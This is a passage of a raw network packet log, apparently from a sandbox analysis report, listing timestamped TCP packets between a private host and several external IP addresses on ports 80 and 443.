                                              Dec 13, 2022 20:08:57.147439003 CET804972631.41.244.228192.168.2.3
                                              Dec 13, 2022 20:08:57.147444010 CET4972680192.168.2.331.41.244.228
                                              Dec 13, 2022 20:08:57.147486925 CET804972631.41.244.228192.168.2.3
                                              Dec 13, 2022 20:08:57.147536993 CET804972631.41.244.228192.168.2.3
                                              Dec 13, 2022 20:08:57.147542000 CET4972680192.168.2.331.41.244.228
                                              Dec 13, 2022 20:08:57.147582054 CET804972631.41.244.228192.168.2.3
                                              Dec 13, 2022 20:08:57.147623062 CET804972631.41.244.228192.168.2.3
                                              Dec 13, 2022 20:08:57.147634029 CET4972680192.168.2.331.41.244.228
                                              Dec 13, 2022 20:08:57.147670984 CET804972631.41.244.228192.168.2.3
                                              Dec 13, 2022 20:08:57.147721052 CET804972631.41.244.228192.168.2.3
                                              Dec 13, 2022 20:08:57.147747993 CET4972680192.168.2.331.41.244.228
                                              Dec 13, 2022 20:08:57.147762060 CET804972631.41.244.228192.168.2.3
                                              Dec 13, 2022 20:08:57.147799969 CET804972631.41.244.228192.168.2.3
                                              Dec 13, 2022 20:08:57.147840977 CET804972631.41.244.228192.168.2.3
                                              Dec 13, 2022 20:08:57.147891045 CET4972680192.168.2.331.41.244.228
                                              Dec 13, 2022 20:08:57.147895098 CET804972631.41.244.228192.168.2.3
                                              Dec 13, 2022 20:08:57.147921085 CET4972680192.168.2.331.41.244.228
                                              Dec 13, 2022 20:08:57.147927046 CET804972631.41.244.228192.168.2.3
                                              Dec 13, 2022 20:08:57.147955894 CET804972631.41.244.228192.168.2.3
                                              Dec 13, 2022 20:08:57.147972107 CET4972680192.168.2.331.41.244.228
                                              Dec 13, 2022 20:08:57.147984028 CET804972631.41.244.228192.168.2.3
                                              Dec 13, 2022 20:08:57.148008108 CET804972631.41.244.228192.168.2.3
                                              Dec 13, 2022 20:08:57.148036957 CET4972680192.168.2.331.41.244.228
                                              Dec 13, 2022 20:08:57.192970037 CET4972680192.168.2.331.41.244.228
                                              Dec 13, 2022 20:08:58.056309938 CET4972780192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:58.083336115 CET8049727185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:58.083455086 CET4972780192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:58.096028090 CET4972780192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:58.096076012 CET4972780192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:58.137963057 CET8049727185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:58.230989933 CET8049727185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:58.231153965 CET4972780192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:58.235589027 CET4972780192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:58.262372017 CET8049727185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:09:07.558366060 CET49728443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:07.558417082 CET4434972820.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:07.558514118 CET49728443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:07.564105034 CET49728443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:07.564138889 CET4434972820.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:07.722922087 CET4434972820.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:07.723131895 CET49728443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:07.747158051 CET49728443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:07.747200966 CET4434972820.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:07.747773886 CET4434972820.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:07.749053001 CET49728443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:07.749079943 CET4434972820.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:07.749109030 CET49728443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:07.749121904 CET4434972820.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:07.930165052 CET4434972820.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:07.930290937 CET4434972820.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:07.930511951 CET49728443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:07.971333981 CET49728443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:07.971334934 CET49728443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:07.971393108 CET4434972820.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:07.971421957 CET4434972820.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:08.118841887 CET49729443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:08.118905067 CET4434972920.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:08.118989944 CET49729443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:08.130464077 CET49729443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:08.130501986 CET4434972920.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:08.272464037 CET4434972920.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:08.276156902 CET49729443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:08.276199102 CET4434972920.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:08.277005911 CET49729443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:08.277025938 CET4434972920.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:08.277062893 CET49729443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:08.277075052 CET4434972920.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:10.900733948 CET4434972920.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:10.900763988 CET4434972920.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:10.900839090 CET4434972920.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:10.901896000 CET49729443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:10.901928902 CET4434972920.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:10.902020931 CET49729443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:10.903924942 CET49729443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:10.903924942 CET49729443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:10.903958082 CET4434972920.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:10.903983116 CET4434972920.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:11.100583076 CET49730443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:11.100666046 CET4434973020.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:11.100944996 CET49730443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:11.101147890 CET49730443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:11.101172924 CET4434973020.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:11.240863085 CET4434973020.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:11.245279074 CET49730443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:11.245327950 CET4434973020.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:11.248110056 CET49730443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:11.248138905 CET4434973020.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:11.248171091 CET49730443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:11.248186111 CET4434973020.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:11.713401079 CET4434973020.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:11.713466883 CET4434973020.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:11.713505983 CET4434973020.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:11.713603973 CET4434973020.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:11.714485884 CET49730443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:11.717180014 CET49730443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:11.717212915 CET4434973020.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:11.717231035 CET49730443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:11.717242956 CET4434973020.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:11.781183958 CET49731443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:11.781241894 CET4434973120.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:11.781363964 CET49731443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:11.781848907 CET49731443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:11.781874895 CET4434973120.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:11.929864883 CET4434973120.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:11.934101105 CET49731443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:11.934128046 CET4434973120.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:11.935256958 CET49731443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:11.935256958 CET49731443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:11.935286045 CET4434973120.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:11.935316086 CET4434973120.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:12.145500898 CET4434973120.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:12.145529985 CET4434973120.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:12.145622015 CET49731443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:12.145634890 CET4434973120.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:12.145648956 CET4434973120.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:12.145697117 CET49731443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:12.146234989 CET49731443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:12.146255970 CET4434973120.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:12.146285057 CET49731443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:12.146295071 CET4434973120.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:12.213138103 CET49732443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:12.213184118 CET4434973220.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:12.213289976 CET49732443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:12.213529110 CET49732443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:12.213545084 CET4434973220.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:12.361771107 CET4434973220.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:12.411429882 CET49732443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:12.411454916 CET4434973220.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:12.412312031 CET49732443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:12.412328005 CET4434973220.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:12.412353039 CET49732443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:12.412364960 CET4434973220.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:13.077426910 CET4434973220.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:13.077451944 CET4434973220.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:13.077461004 CET4434973220.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:13.077516079 CET4434973220.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:13.077545881 CET49732443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:13.077565908 CET4434973220.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:13.077584982 CET49732443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:13.077655077 CET4434973220.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:13.077811003 CET49732443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:13.078193903 CET49732443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:13.078218937 CET4434973220.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:13.078237057 CET49732443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:13.078244925 CET4434973220.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:13.108043909 CET49733443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:13.108108997 CET4434973320.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:13.108254910 CET49733443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:13.108494997 CET49733443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:13.108514071 CET4434973320.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:13.250015020 CET4434973320.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:13.251218081 CET49733443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:13.251254082 CET4434973320.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:13.251976013 CET49733443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:13.251995087 CET4434973320.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:13.252033949 CET49733443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:13.252052069 CET4434973320.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:13.420001030 CET4434973320.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:13.420053005 CET4434973320.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:13.420104027 CET4434973320.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:13.420186043 CET49733443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:13.420228958 CET4434973320.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:13.420248985 CET49733443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:13.420248985 CET4434973320.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:13.420321941 CET49733443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:13.421076059 CET49733443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:13.421113014 CET4434973320.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:13.421138048 CET49733443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:13.421150923 CET4434973320.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:13.473985910 CET49734443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:13.474070072 CET4434973420.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:13.475042105 CET49734443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:13.478266954 CET49734443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:13.478310108 CET4434973420.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:13.618787050 CET4434973420.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:13.619625092 CET49734443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:13.619653940 CET4434973420.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:13.620541096 CET49734443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:13.620548964 CET4434973420.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:13.620620012 CET49734443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:13.620630980 CET4434973420.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:13.794636965 CET4434973420.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:13.794673920 CET4434973420.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:13.794725895 CET4434973420.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:13.794811010 CET49734443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:13.794837952 CET4434973420.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:13.794857979 CET49734443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:13.794905901 CET4434973420.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:13.794965982 CET49734443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:13.807322025 CET49734443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:13.807360888 CET4434973420.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:13.807400942 CET49734443192.168.2.320.190.159.19
                                              Dec 13, 2022 20:09:13.807410955 CET4434973420.190.159.19192.168.2.3
                                              Dec 13, 2022 20:09:13.870378017 CET4973580192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.870765924 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.931406975 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:13.931442022 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:13.931653023 CET4973580192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.931657076 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.939228058 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.939507008 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.939737082 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.939889908 CET4973580192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.939899921 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.940058947 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.940188885 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.940316916 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.940448999 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.940576077 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.940690994 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.940812111 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.940937042 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.941055059 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.943474054 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.943599939 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.943721056 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.943844080 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.943968058 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.944089890 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.944211960 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.944475889 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.944602966 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.944695950 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.944785118 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.944878101 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.945003033 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.945132017 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.945240974 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.945332050 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.945421934 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.945543051 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.945671082 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.945770979 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.945858002 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.945944071 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.946059942 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.946186066 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.946301937 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.946391106 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.946477890 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.946587086 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.946711063 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.946827888 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.946934938 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.947036028 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.947146893 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.947277069 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.947398901 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.947490931 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.947578907 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.947681904 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.947805882 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.947930098 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.948025942 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.948117018 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.948230982 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.948360920 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.948487043 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.948579073 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.948668957 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.948767900 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.948893070 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.949029922 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.949134111 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.949223042 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.949331045 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.952039003 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.952176094 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.952323914 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.952451944 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.952569008 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.952687025 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.952877045 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.953006983 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.953185081 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.953417063 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.953571081 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.953917027 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.954039097 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.954173088 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.954302073 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.954422951 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.954540968 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.954662085 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.954790115 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.954916000 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.955060005 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.955215931 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.955332041 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.955461979 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.955615997 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.955724955 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.955853939 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.955984116 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.956115007 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.956244946 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.956374884 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.956501961 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.959047079 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.959258080 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.959458113 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.959650993 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.959781885 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.960102081 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.960226059 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.960328102 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.960426092 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.960516930 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.960609913 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.960704088 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.960793018 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.960892916 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.960983038 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.961080074 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.961169958 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.961261034 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.961354017 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.961447001 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.961539030 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.965418100 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.965507030 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.965601921 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.965706110 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.965799093 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.965893984 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.965987921 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.966089010 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.966175079 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.966279030 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.966366053 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.966459990 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.966552973 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.966651917 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.966741085 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.966837883 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.966953993 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.967058897 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.967154026 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.967251062 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.967348099 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.967442989 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.967540026 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.967634916 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.967734098 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.967829943 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.968069077 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.968214989 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.968384981 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.968523026 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.968666077 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.968826056 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.969001055 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.969137907 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.969271898 CET4973680192.168.2.362.204.41.79
